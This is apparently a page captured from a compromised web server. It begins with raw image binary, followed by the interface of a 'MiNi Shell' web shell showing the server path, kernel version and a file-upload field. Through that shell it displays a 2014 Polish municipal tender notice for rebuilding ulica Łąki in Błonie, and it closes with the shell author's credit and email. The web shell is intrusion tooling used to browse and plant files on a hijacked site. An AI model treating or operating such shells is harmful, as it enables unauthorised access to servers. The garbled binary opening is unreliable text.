JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140508/155642-N-2014.html

<p class="kh_header"><b>Błonie: Rozbudowa ulicy Łąki w Błoniu, na odcinku od ulicy Grodziskiej do ulicy Poniatowskiego.</b><br>
<b>Numer ogłoszenia: 155642 - 2014; data zamieszczenia: 08.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Błonie , Rynek 6, 05-870 Błonie, woj. mazowieckie, tel. 022 7253004, 7253006, faks 022 7253067.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.blonie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa ulicy Łąki w Błoniu, na odcinku od ulicy Grodziskiej do ulicy Poniatowskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> - Budowa odwodnienia nawierzchni ul. Łąki w miejscowości Błonie.
- Budowa kanalizacji telekomunikacyjnej TP S.A. w ul. Łąki w m. Błonie oraz 	przyłącza 
  telekomunikacyjnego na dz. nr ew. 4/17 do budynku Zespołu Szkół nr 1.
- Budowa oświetlenia ulicznego w ul. Łąki w m. Błonie.
- Budowa nawierzchni drogowej, chodników, ścieżki rowerowej i zjazdów w ul. Łąki w              
   m. Błonie.

1. Zakres robót obejmuje m.in.:
Zadanie nr 1 -  budowa odwodnienia nawierzchni ulicy Łąki
1) likwidacja istniejących rowów przydrożnych,
1) likwidacja istniejących przepustów pod zjazdami,
2) budowa nowych rowów przydrożnych retencyjno - odparowywalnych,
3) budowa przepustów pod zjazdami,
4)budowa przykanalików,
5) budowa kanalizacji deszczowej.

Zadanie nr 2 - budowa kanalizacji telekomunikacyjnej TP S.A.
1) demontaż istniejącej sieci TP,
2) przebudowa kabli doziemnych,
3) przebudowa telekomunikacyjnej linii słupowej,
4) przebudowa kabli napowietrznych na podbudowie słupowej,
5) budowa telekomunikacyjnej kanalizacji kablowej i studni kablowych.

Zadanie nr 3 - budowa oświetlenia ulicznego 
1) demontaż istniejącego oświetlenia,
2) budowa oświetlenia ulicznego
3) przebudowa linii nn,
4) przebudowa linii SN.
Zadanie nr 4 - budowa nawierzchni drogowej, chodników, ścieżki rowerowej i zjazdów
1) rozbiórka istniejącej nawierzchni,
2) korytowanie nawierzchni,
3) budowa drogi,
4) budowa zjazdów do posesji,
5) budowa ścieżki rowerowej,
6) budowa chodnika.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego , o którym jest 
mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.23.31.00-0, 45.23.30.00-9, 45.23.32.53-7, 45.23.10.00-5, 45.23.24.52-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium: 
    1. Wysokość wadium.
    1.1. Każda składana oferta musi być zabezpieczona wadium w wysokości 150.000,00 PLN     
           (słownie: sto pięćdziesiąt tysięcy złotych).   
    2. Forma wadium.
    2.1. Wadium może być wnoszone w jednej lub kilku następujących formach:
     a). pieniądzu,
     b). poręczeniach bankowych  lub poręczeniach spółdzielczej kasy oszczędnościowo -  
           kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
     c). gwarancjach bankowych,
     d). gwarancjach ubezpieczeniowych,
     e). poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
          ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju      
          Przedsiębiorczości  (Dz. U. Nr 109, poz. 1158,  z późn. zm.)
    3. Miejsce i sposób wniesienia wadium.
    3.1. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy  
           Zamawiającego:  Bank PKO BP S.A.  VO/Warszawa
                                        nr rachunku: 95 1020 1055  0000 9302 0024 2743
    3.2. Do oferty należy dołączyć kopię polecenia przelewu potwierdzoną za zgodność z 
           oryginałem lub dostarczyć ją Zamawiającemu przed otwarciem ofert.
    3.3. Wadium wnoszone w formie pieniężnej uznaje się za wniesione, jeżeli znajdzie się na   
           koncie Zamawiającego przed upływem terminu składania ofert.
           Termin wniesienia wadium potwierdza bank prowadzący bankową obsługę Gminy.
    3.4. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
    3.5. W przypadku składania wadium w jednej z form wymienionych w pkt 2.1 niniejszego 
            rozdziału, dokument winien zawierać jednoznacznie sformułowane: nazwę  i adres 
           Zamawiającego, przedmiot zamówienia i nr sprawy, termin obowiązywania dokumentu,     
           wysokość wadium oraz warunki zwrotu i zatrzymania przez Zamawiającego wadium 
           wraz z odsetkami, zgodnie z art. 46 ustawy z dnia 29 stycznia 2004 r. Pzp.
    4. Oryginał wadium (w przypadku przelewu - potwierdzenie dokonania przelewu na konto 
        Zamawiającego) należy złożyć w Wydziale Zamówień Publicznych w Urzędzie Miejskim
        w Błoniu (Ratusz), ul. Rynek 6, pokój nr 3 (parter) - przed upływem terminu składania         
        ofert lub załączyć do oferty.
    5. Wykonawca, który nie wniósł wadium zostaje wykluczony z postępowania na podstawie 
         art. 24 ust. 2 pkt 2, a złożoną przez niego ofertę uznaje się za odrzuconą.
    6. Zwrot wadium.
    6.1. Zamawiający zwraca wadium zgodnie z zapisem art. 46 ust. 1- 4 ustawy Pzp
    7. Utrata wadium.
   7.1. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi
          na wezwanie, o którym mowa w art. 26 ust.3 ustawy Prawo zamówień publicznych
          nie złożył dokumentów lub oświadczeń lub pełnomocnictw, chyba że udowodni, że 
          wynika to z przyczyn nieleżących po jego stronie.   
   7.2. Zamawiający zatrzymuje wadium wraz z odsetkami, w przypadkach określonych w 
          art.46 ust.5 ustawy jeżeli Wykonawca, którego oferta została wybrana:
     a). odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
          określonych w ofercie,
     b). nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
     c). zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn   
          leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie posiadania wiedzy i doświadczenia;
      - Zamawiający uzna, że Wykonawca spełnia warunek dotyczący wiedzy i doświadczenia, jeżeli 
       wykaże,  że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres   
prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej:
a) dwie roboty o podobnym charakterze co przedmiot zamówienia, tj. robót polegających na budowie lub przebudowie dróg o nawierzchni asfaltowej, o długości min. 1 km każda, 
z podaniem daty i miejsca wykonania oraz wartości. Do wykazanych robót należy załączyć dokumenty (referencje) potwierdzające, że robota została wykonana zgodnie 
z zasadami sztuki budowlanej i prawidłowo ukończona. 

b) dwie roboty polegające na budowie lub przebudowie kanalizacji deszczowej lub sanitarnej, 
o długości 500 mb każda, z podaniem daty i miejsca wykonania oraz wartości. Do wykazanej  roboty należy załączyć dokumenty (referencje) potwierdzające, że robota została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona. 

c)  jedną robotę polegającą na budowie lub przebudowie sieci teletechnicznej, o długości co najmniej 500 mb, z podaniem daty i miejsca wykonania oraz wartości. Do wykazanej roboty należy załączyć dokumenty (referencje) potwierdzające, że robota została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona.

d) jedną robotę polegającą na budowie lub przebudowie sieci elektrycznej, o długości co najmniej 500 mb, z podaniem daty i miejsca wykonania oraz wartości. Do wykazanej roboty należy załączyć dokumenty (referencje) potwierdzające, że robota została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania potencjałem 
technicznym, jeżeli złoży oświadczenie, że dysponuje lub będzie dysponował sprzętem, narzędziami i urządzeniami niezbędnymi do wykonania przedmiotu zamówienia, zgodnie ze specyfikacjami wykonania i odbioru robót, wraz z informacją o podstawie dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania osobami 
zdolnymi do wykonania zamówienia, jeżeli wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia w tym:
         kierownikiem budowy w specjalności drogowej, z uprawnieniami budowlanymi do
         nadzorowania (kierowania) robotami budowlanymi bez ograniczeń w specjalności drogowej 
         posiadającym  co najmniej 3 letnie doświadczenie w nadzorowaniu (kierowaniu) robotami 
branży drogowej przy budowie lub przebudowie dróg licząc od dnia uzyskania uprawnień z aktualnym zaświadczeniem o przynależności do Izby Inżynierów Budownictwa,

       - kierownikiem robót  sanitarnych, z uprawnieniami budowlanymi spec. sanitarnej 
posiadającym co najmniej 3 letnie doświadczenie w nadzorowaniu (kierowaniu) robotami branży sanitarnej przy budowie lub przebudowie kanalizacji deszczowej lub sanitarnej, licząc od dnia uzyskania uprawnień do kierowania robotami sanitarnymi z  aktualnym zaświadczeniem o przynależności do Izby Inżynierów Budownictwa.
   
      - kierownikiem robót elektrycznych, z uprawnieniami budowlanymi spec. elektrycznej 
posiadającym  co najmniej 3 letnie doświadczenie w nadzorowaniu (kierowaniu) robotami branży elektrycznej przy budowie lub przebudowie sieci elektrycznych, licząc od dnia uzyskania uprawnień do kierowania robotami elektrycznymi z aktualnym zaświadczeniem o przynależności do Izby Inżynierów Budownictwa.

- kierownikiem robót teletechnicznych, z uprawnieniami budowlanymi spec. teletechnicznej posiadającym  co najmniej 3 letnie doświadczenie w nadzorowaniu (kierowaniu) robotami branży teletechnicznej przy budowie lub przebudowie sieci teletechnicznej, licząc od dnia uzyskania uprawnień do kierowania robotami teletechnicznymi z  aktualnym zaświadczeniem o przynależności do Izby Inżynierów Budownictwa.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna, że Wykonawca spełnia warunek dotyczący sytuacji ekonomicznej i 
          finansowej jeżeli wykaże, że posiada opłaconą polisę OC w zakresie prowadzonej działalności 
          związanej z przedmiotem zamówienia na kwotę nie mniejszą niż  500 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Na ofertę składają się inne dokumenty wymagane przez Zamawiającego:
 1.1. druk oferty wypełniony i podpisany przez osoby uprawnione, (załącznik nr 1 do SIWZ)
 1.2. dowód wniesienia wadium
 1.3. oświadczenie o spełnianiu warunków określonych przepisami art. 44 ustawy Pzp,    
        (załącznik nr 4 do SIWZ)
 1.4 druk oświadczenia o przynależności do grupy kapitałowej, (załącznik nr 5 do SIWZ)          
 1.5. podpisany wzór umowy, (załącznik nr 9 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, 
        na podstawie której dokonano wyboru Wykonawcy, zgodnie z art. 144 ust.1 ustawy Pzp, 
        chyba, że wystąpiły nw. okoliczności:
1.1. zmiana wynagrodzenia związana ze zmianą zakresu robót:
a)  konieczności wykonania robót zamiennych. Nastąpi wówczas rozliczenie robót zamiennych, 
b) rezygnacja przez Zamawiającego z realizacji części przedmiotu zamówienia. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które poniósł Wykonawca w związku z wynikającymi z umowy planowanymi świadczeniami.
1.2. zmiana terminu realizacji w związku z następującymi przypadkami :
a) koniecznością wprowadzenia zmian w dokumentacji projektowej, wynikających ze zmiany zastosowania urządzeń technologicznych (np. braki w produkcji, itp), wymogów sztuki budowlanej i wiedzy technicznej lub powszechnie obowiązujących przepisów prawa,
b) z brakiem możliwości prowadzenia robót na skutek obiektywnych warunków atmosferycznych lub jeżeli warunki atmosferyczne uniemożliwiają prowadzenie robót budowlanych zgodnie z wymaganiami opisanymi w specyfikacji technicznej lub sztuką budowlaną. Wstrzymanie robót z tego powodu musi być potwierdzone w dzienniku budowy i zaakceptowane przez inspektora nadzoru inwestorskiego. Wstrzymanie robót budowlanych ze względu na warunki  atmosferyczne typowe  (właściwe) dla danej pory roku i miesiąca, lub zła organizacja robót nie uzasadnia zmiany umowy,
c) wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezawinionych przez   
    Wykonawcę,
d) opóźnieniem niezależnym od Wykonawcy związanym z uzyskiwaniem przez Wykonawcę
     dokumentów w myśl ustawy Prawo budowlane,
e) koniecznością wykonania zamówień dodatkowych, uzupełniających lub robót zamiennych,
f) innymi okolicznościami niepowstałymi z winy Wykonawcy ( które nie miałyby wpływu na jego wybór ),
g) innymi okolicznościami leżącymi po stronie Zamawiającego, a w szczególności sytuacją finansową, zdolnościami płatniczymi  lub warunkami organizacyjnymi.
1.3. inne przyczyny
   a) zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości 
       stawki   podatku VAT) .
2. Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić 
    zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody zarówno 
     przez Zamawiającego jak i przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.blonie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Błoniu, ul. Rynek 6, 05-870 Błonie, pok. nr 3 Wydział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2014 godzina 11:00, miejsce: Urząd Miejski w Błoniu, ul. Rynek 6, 05-870 Błonie, pok. nr 1 Biuro Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osoby uprawnione do kontaktu z Wykonawcami: Iwona Kopczyńska, Bożena Hofman ( procedury przetargowe) -  Urząd Miejski w Błoniu, ul. Rynek 6, Wydział Zamówień Publicznych,  pok. nr 3  
tel. 22 725-30-04  w.180,.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com